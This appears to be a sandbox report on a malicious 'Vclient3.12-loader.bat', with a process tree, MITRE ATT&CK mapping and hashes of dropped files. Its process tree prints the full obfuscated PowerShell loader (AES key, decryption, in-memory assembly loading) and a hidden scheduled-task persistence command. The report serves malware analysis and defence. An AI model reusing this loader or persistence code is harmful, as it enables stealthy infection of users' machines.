$jqVvs=$lpWSJ.Substring(3); break; }}$payloads_var=[string[]]$jqVvs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:5828
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_601_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_601.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:5952
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_601.vbs"
    3⤵
    PID:6132
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_601.bat" "
      4⤵
      PID:1304
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        
        PID:2968
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:3176
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IvmgzXjQuMVka6TfIyG1HvCr7DfXZYnR3O8Q3T8SJgE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JbClhals/5qz6aDu+zXVpA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aNToN=New-Object System.IO.MemoryStream(,$param_var); $rAzqO=New-Object System.IO.MemoryStream; $bDCjb=New-Object System.IO.Compression.GZipStream($aNToN, [IO.Compression.CompressionMode]::Decompress); $bDCjb.CopyTo($rAzqO); $bDCjb.Dispose(); $aNToN.Dispose(); $rAzqO.Dispose(); $rAzqO.ToArray();}function execute_function($param_var,$param2_var){ $Wdwoi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fjmwH=$Wdwoi.EntryPoint; $fjmwH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_601.bat';$vmyBp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_601.bat').Split([Environment]::NewLine);foreach ($lpWSJ in $vmyBp) { if ($lpWSJ.StartsWith(':: ')) { $jqVvs=$lpWSJ.Substring(3); break; }}$payloads_var=[string[]]$jqVvs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1844

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\Vclient3.12-loader.bat"
1⤵
PID:5676
- C:\Windows\system32\net.exe
  net file
  2⤵
  PID:5552
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:5568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IvmgzXjQuMVka6TfIyG1HvCr7DfXZYnR3O8Q3T8SJgE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JbClhals/5qz6aDu+zXVpA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aNToN=New-Object System.IO.MemoryStream(,$param_var); $rAzqO=New-Object System.IO.MemoryStream; $bDCjb=New-Object System.IO.Compression.GZipStream($aNToN, [IO.Compression.CompressionMode]::Decompress); $bDCjb.CopyTo($rAzqO); $bDCjb.Dispose(); $aNToN.Dispose(); $rAzqO.Dispose(); $rAzqO.ToArray();}function execute_function($param_var,$param2_var){ $Wdwoi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fjmwH=$Wdwoi.EntryPoint; $fjmwH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\Downloads\Vclient3.12-loader.bat';$vmyBp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Vclient3.12-loader.bat').Split([Environment]::NewLine);foreach ($lpWSJ in $vmyBp) { if ($lpWSJ.StartsWith(':: ')) { $jqVvs=$lpWSJ.Substring(3); break; }}$payloads_var=[string[]]$jqVvs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:5668
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_496_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_496.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3496
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_496.vbs"
    3⤵
    PID:5172
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_496.bat" "
      4⤵
      PID:1828
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        
        PID:3160
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:4268
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IvmgzXjQuMVka6TfIyG1HvCr7DfXZYnR3O8Q3T8SJgE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JbClhals/5qz6aDu+zXVpA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aNToN=New-Object System.IO.MemoryStream(,$param_var); $rAzqO=New-Object System.IO.MemoryStream; $bDCjb=New-Object System.IO.Compression.GZipStream($aNToN, [IO.Compression.CompressionMode]::Decompress); $bDCjb.CopyTo($rAzqO); $bDCjb.Dispose(); $aNToN.Dispose(); $rAzqO.Dispose(); $rAzqO.ToArray();}function execute_function($param_var,$param2_var){ $Wdwoi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fjmwH=$Wdwoi.EntryPoint; $fjmwH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_496.bat';$vmyBp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_496.bat').Split([Environment]::NewLine);foreach ($lpWSJ in $vmyBp) { if ($lpWSJ.StartsWith(':: ')) { $jqVvs=$lpWSJ.Substring(3); break; }}$payloads_var=[string[]]$jqVvs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:204

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
1008B

MD5
d222b77a61527f2c177b0869e7babc24

SHA1
3f23acb984307a4aeba41ebbb70439c97ad1f268

SHA256
80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

SHA512
d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
0ec9956f3890ee7249f829ecf868badb

SHA1
befcd8ab9a32f3804fa24a16b2fd5db56d5f619a

SHA256
7c4e407589b734840e73d260f171c2da7cf664ccf94de27688cf5d02b5b9697a

SHA512
3a46164faf7fe61ed7c5b8eb5f20a261ac89bf14994920e67792d21d59983fe55d7086da1ef17a8034f25c4b18bed40141eb4e32560710bc3a052606ac8d5f70

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
0f8c591712ba09a1e09c5d5effd47174

SHA1
8a13d7bc4063bb04695530823acad0933f401f9b

SHA256
ff0170b6e0178bf3c860305d863e1d02d6105ee3ea2cb311d967413573ba0f9b

SHA512
afa26b8241a356c511cc421a2a7c10ce0afb575df4b882810d79ace8bd26d42e31e9359894dfef3459a0e545c8a25c158d5ac149ca118ee539ba6a5a40552a53

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
2cce59419e670d988a79592ca05fce9b

SHA1
45f1e06b89ced40c275b20db95f7ae92545e1db4

SHA256
e3815979f7d05b5a6504cb8e056aaa16b55961a202497963738f268b172dc2ad

SHA512
69eb31f2afca6033b87d6c2980029e5cd755a884fd2757987a12907998a3f7741a2bfdd6100cca34cfe1ce559aec448b01ac44ad2242dced79a7aa0fd7f9dabe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
27ce27d5a8ffc828d280da0dcca9e06c

SHA1
761d2132511e3454901ca648dca4e384eac72e9f

SHA256
5af6c177bcdbd7010350440e0427c8336a46c69137ceeda311644f09873a4d9e

SHA512
c0b440d0d6f6ad8127ba00838a6243cc9ae2450b5ddf220fc4f664e5c2eb136e75bc9006745bbc85001b4a5f1b9e43d65433eb8fcdc905c6b6dfa92d267e227f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
a825ada78b779a611f0aa38a943a816a

SHA1
78f51f73195e5cbcd1b18d9f4dde9ffd989c4fff

SHA256
469d9c0ddcf6dc4b0a68e6cb2334a958fb262135b5b2cc6a39cfb6e5fa56d087

SHA512
18fd6f70980291783f24785313b20d6b8a6a66c3bc9b1c4a783eb1044fb803cb4b259094a5e6204f32b8610ba8c76fc143092846a6789a48e9791c6ee6a3bc9a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
f467152bc874419d31dcacdbb14bffba

SHA1
8835411a166c9022aeb4ca3baa1d85d0f055b48f

SHA256
8260fc6a74d4122bab267d104aed30858cb1bdabeb13999a35cc10cc4b52b956

SHA512
7466dbf641b9919ae2d66260a3940a84de50b2fb00ca0d5cf90667b87747911d6c3c400988e99deb25741c3122ccdcf9f866487f58daec4d78d92451d29f5cb7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
cf24206e5814eb5ca22cb328f3e30985

SHA1
75667ec6e998e009d9c3eed2b5db7595095a8960

SHA256
d26e8d96f1eb1476d094fb810fa2664c05515026382ef92d52951cf2cf49fc57

SHA512
edc75262314f4c41d8b5544350bace1cadb740f2ef86fd556d420db7308d5acc6a7af3ca165bab8f8fa40ea0d916b307a1fea0c9aed79089c569bd9b7bdc423c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
9efedbe4450f2b39db69b243c6dc5283

SHA1
907cd40fd66af2254a21d4c684ca22e891d57449

SHA256
a4d66aea3b6d188ef4c5be5ef97eda9de78d26c5ab6fd6a2f571141ade4ef099

SHA512
d10d7105df16091790638ed55269a59868af572f81e7313862d41b9dda69fded23a080fcb5facf57a955aa6eacdaa8e294c3629ef04bd4f7e9a20d1d19491ebf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
6063f622df8150626c35bc709d52ec49

SHA1
78c0e8d6639d9ed9a60a3643276d5930b9e1d686

SHA256
660bda342d56401af194e94905ad3b6a6f4b0ee631e62e62d2d4eda49be42ffb

SHA512
7db7ef0811e0ddaebffc1b85f898a0142bf1023632b490880c97ffdfaa4ece5940bed7156a10a751687d8eea57adcabb26257dc2f6d3b9d7f9a74b2e686b0a1e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
4ed23580a38f1e42f850c4ff5a0bfeaa

SHA1
055e81897c6905e8ecdb401cb64bc90d552867bb

SHA256
7e8aca5749b2f2a397fe8417145b631d38e193fa5be5a3090234f0cde514c334

SHA512
53579046e4b06473ab100c9d4956494255d87e592acd9db89f9db7feaf9d5209bae7383ba537d037e729be1ae6d93431ae69acd23fd48d2a09cda7132e991db7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
bb98c400bc9752b08ab105f97580cb38

SHA1
6b8d2c20ea333193de3793d677251528d647faff

SHA256
e43d4bd7a737b1128657352c9bc1bb3b9997b489a9a405a5e819561f00d0d22e

SHA512
ad7e0c65bb635bc5f5dd99cc8efb64306ce4e986613871679a1dcb9a5dd5a88a7cf36edcca8b1012f1b24f4c0b8082a46abb4730162d7df5fe07cbad37567767

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
1c35191aeeb41c263fe8d5702ecd1296

SHA1
d07f1e7e766de07d958daf075a09797cd3caa01f

SHA256
ca0f8da3586cae391ca0985352494daec4882e2b38d338b4006adc4638939c78

SHA512
af457e25cd8661304f1722d0985c0e496e9c830bb5dd70d8df715b7868515505830f5794093f261f9acbe7cc644bea36fa118b42f244e86755df1063edac69bf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
62ec120007bb329d6536f6b177d49982

SHA1
e9182574378b5c31ff4fe3959427ca58e131fd19

SHA256
f0256af8aa338431cf402c86f4b2080ee524bfa489f80664ba7ccecb93e3f458

SHA512
41f5f59e51b985b3246fb77a25423aa34a5407a946dd273d344f7e2c137a47adff5047c42232841e3c602a1bb65ceb3739dd440cfe6aaa1b77ebcede6a99ebf8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
87aba3aefce0548b12c2d9df6d971dee

SHA1
e133601e9e932b98c0d33943408853552ac50ad5

SHA256
298ba36a864c36248451e13286ccfe82cc862a71e7d2eb9b7923fba2cb650a57

SHA512
de94d04c9e6234d22179b93f0d9efec307c83d3ae721c1df3d8e961ec2d8995bf221ced3abbe681caf315de1581197c078539d65a9224eed63ee6110e729a8b1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
c5e8cc209bae6a37e2fe17e8201d5284

SHA1
f06e9b0aa4f9e1d644a48e19b36333bd7c6fcbbe

SHA256
aeae030edf17c53f559f91599203235af35b8d9f2480881835723c7886aefc28

SHA512
9ea354685e56245f210937730d77acd82defb08843f525ed69e792cfda5eac06138ae093566b4485950fbe21e352d6c7604c7d6995f33fba99a56b786d1f0224

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
8b6e2e1956636b4e15ee87c4ceb005ad

SHA1
c0ddc9d9e8a13d1180ad5030ff2c6e9d1b6ce122

SHA256
7ad510098452d38cfa7e4a9b6a9ded39e77243ba2659dea57d1848f36c88a146

SHA512
9264517d633c6d68f37187c863995218d1a0ac95379b303d03a4c5e5a1f134b4b0a9679079deee11ef96ddf7ae7eada622c4d251eef1ea49821596d4e2dea62b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
123KB

MD5
ffe600c228b979ed06db855bc016fd65

SHA1
3341b4fe7cdab1150d502d0a39fd5289afe6138e

SHA256
321c3b1a8bd529947624c8a71e1c677ce7617ac784d826e22e28b5df9df9af04

SHA512
95ad5acefb8f1a532bf49a02e0e05918dab8bd4c1668d75609ef9804882ae70561993682cffd4079425c8fa5e4cb5e9a7f70da7f6d85a3af86437ee5f87d1551

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
123KB

MD5
266c443862269a3f0f5e0f1b5f63b767

SHA1
7a3eff3e18f4cee1d01658cb112dd0446b1e4f96

SHA256
7265f589a2976c333c4991b6b3a78c2e89dca0759c8f626ef5dce2c3630f4364

SHA512
95bc967e582dd7e21e4095220fd319edee7ddd60bcfcd8b8a994d86836c140fbc714df053f29cae2d61c8121a14adb2ee26af27a54d2d988f69f9d5ba6d3074e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
eb15ee5741b379245ca8549cb0d4ecf8

SHA1
3555273945abda3402674aea7a4bff65eb71a783

SHA256
b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636

SHA512
1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\50823d73-396d-4e78-be5b-c54acff16982.down_data

Filesize
555KB

MD5
5683c0028832cae4ef93ca39c8ac5029

SHA1
248755e4e1db552e0b6f8651b04ca6d1b31a86fb

SHA256
855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

SHA512
aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2h4vhhfi.wra.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_496.vbs

Filesize
115B

MD5
e520a1271529ce39773dac176bbdf0fc

SHA1
09a1ba7f79fb7e974a2aea036c6a08d4c2e51f5b

SHA256
446858539d1704379372857fd248a9e1387d5e253a1528f1d961b16aa137dcf4

SHA512
379478c2a0d8a7174ace7ee4459bd0f47e640e58212f082c25b997aab06e7f46316125a20a7a59828d95fce46a35dd4579992896b8cf52ef7f9501d60a9280b3

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_577.vbs

Filesize
115B

MD5
3861ef2550d41d8cb8eb4175b2d0fad1

SHA1
a346f6390c8e5f0078a8a1cb76e34c52ee606cd7

SHA256
f045dffcd11c143b4544f591d37247b6142088acc6bf1ab67eae8f764e2fadaa

SHA512
db4f2fe9b67227102d239f5f2c219b33dfe61bd8df57365fa363e53832c2e29c88ce5b3a314e8d0058d9492eb19747cbaec085377029e4edf0ee5c3733367ff7

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_601.vbs

Filesize
115B

MD5
50e8205aed3a16fbeaaa261ef0f844dc

SHA1
0919b9c572a01dea236195a702dead26caf5ae0c

SHA256
8e4fbe4a889f97b3ea569cdc5b1f6d2ca06412f34a809473b5e240588aafd223

SHA512
09e3aac20d70b66d4f249857e5fb399f6973a3031afca54bd1527cc96afbe87e99140a1c554c3f7ed48b9190ab1ea01d7b61446c7dffc1440b08239c24a7e423

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 527830.crdownload

Filesize
337KB

MD5
b0b26501fa33bc553f9a54ca28a89a85

SHA1
9f868d7d464375d1ea60c5234f4dd057ea85fce1

SHA256
f60cc29ba04d75d31227e8f0417640ed962d2cbfb537072b1b00aa89df9be473

SHA512
fcd9680de0ce271730f9cc5968d3172ed03e2463e53af66b19c898e7ac0e6c97717f8948d27e329f30f78ba051bb4a81acb4dc837ce602964e64470a6a0f3069

Download Submit
C:\Users\Admin\Downloads\Vclient3.12-loader.bat:Zone.Identifier

Filesize
230B

MD5
0597dc94d49ebd0ae2dab5ed4294f00a

SHA1
6931d55fd40eb3c5d7a06cc878ca634d71070723

SHA256
70d7968cb6bd85a2b906fd2fda4375c31cf90aaa40e8b59ff1cfc2c9aaf5d21f

SHA512
7faffc6ebd54fff9fd49f0b469076fb5c4b2b41d73f5c9d4cbf29236b1b12d11fb73c23e3bacb4ed79ba052f66647e5ddf2f557ea6de695d9bea49f26a38da5a

Download Submit
memory/204-310-0x000001A327C20000-0x000001A327C52000-memory.dmp

Filesize
200KB

Download
memory/3488-119-0x000001CD7BA90000-0x000001CD7BAC2000-memory.dmp

Filesize
200KB

Download
memory/4920-71-0x000001FB6A5B0000-0x000001FB6A5F2000-memory.dmp

Filesize
264KB

Download
memory/4920-70-0x000001FB6A5A0000-0x000001FB6A5A8000-memory.dmp

Filesize
32KB

Download
memory/4920-62-0x000001FB52070000-0x000001FB52092000-memory.dmp

Filesize
136KB

Download